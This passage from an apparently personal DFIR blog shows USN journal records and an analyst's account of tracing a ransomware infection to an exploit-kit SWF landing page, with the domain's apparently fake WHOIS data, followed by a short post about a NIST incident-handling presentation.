FileSequenceNumber       : 106
ParentFileRecordNumber   : 899
ParentFileSequenceNumber : 21
Usn                      : 4743725296
TimeStamp                : 6/8/2016 1:22:51 AM
Reason                   : FILE_CREATE
SourceInfo               : 0
SecurityId               : 0
FileAttributes           : 8208
FileName                 :

VolumePath               : \\.\C:
Version                  : 2.0
RecordNumber             : 33303
FileSequenceNumber       : 620
ParentFileRecordNumber   : 244618
ParentFileSequenceNumber : 3
Usn                      : 4743722896
TimeStamp                : 6/8/2016 1:22:51 AM
Reason                   : FILE_CREATE
SourceInfo               : 0
SecurityId               : 0
FileAttributes           : ARCHIVE, NCI
FileName                 : truck-yield-damage-objection-journey-punish-dizzy-sl


The HTM file was recovered from the file system, essentially when loaded it redirects to the domain which instantiates the SWF flash object. The randomized sub-domain (as well as odd TLD '.top), and randomized SWF file name are both highly suspect.

Not surprisingly the SWF flash object was ZLIB compressed. After unpacking, it was obviously an Exploit Kit landing page used to exploit some older (2014) browser vulnerabilities. The ransomware variant was a much newer iteration at the time.

Virustotal results (almost 6 months later) are somewhat discouraging for this domain:

Registrant information for this domain:
Updated Date: 2016-06-08T00:20:29Z Creation Date: 2016-06-08T00:09:59Z Registry Expiry Date: 2017-06-08T00:09:59Z Sponsoring Registrar: Alpnames Limited Sponsoring Registrar IANA ID: 1857 Domain Status: clientTransferProhibited Registrant ID: alp_54912665 Registrant Name: Clive Hoetnez Registrant Organization: N/A Registrant Street: N/A Registrant City: Smallvile Registrant State/Province: Arkansas Registrant Postal Code: 43547 Registrant Country: US Registrant Phone: +1.447898 Registrant Phone Ext: Registrant Fax: Registrant Fax Ext: Registrant Email:

6paq is a random temporary email provider.


I didn't really want to cover much else specifically in this post. This is really only one component of an investigation of this type. There are a number of other artifacts and avenues you would want to go down to draw broader conclusions about your case. Mostly, my intent was to demonstrate some of the thought process in tackling a fairly common problem with a somewhat creative solution and demonstrate the importance of this quality in DFIR work. Hopefully you learned something from this post, please feel free to leave comments as usual.

Thursday, October 20, 2016

Computer Security Incident Handling Guide - A presentation based off of the NIST paper

A few years ago during an interview at Mandiant I was asked to create a presentation based on the NIST Computer SecurityIncident Handling Guide, a good primer on incident handling that I would recommend every NetSec  professional to read.

Although the presentation is light in description, the basic outline remains. If the content interests you I would highly recommend reading the NIST report.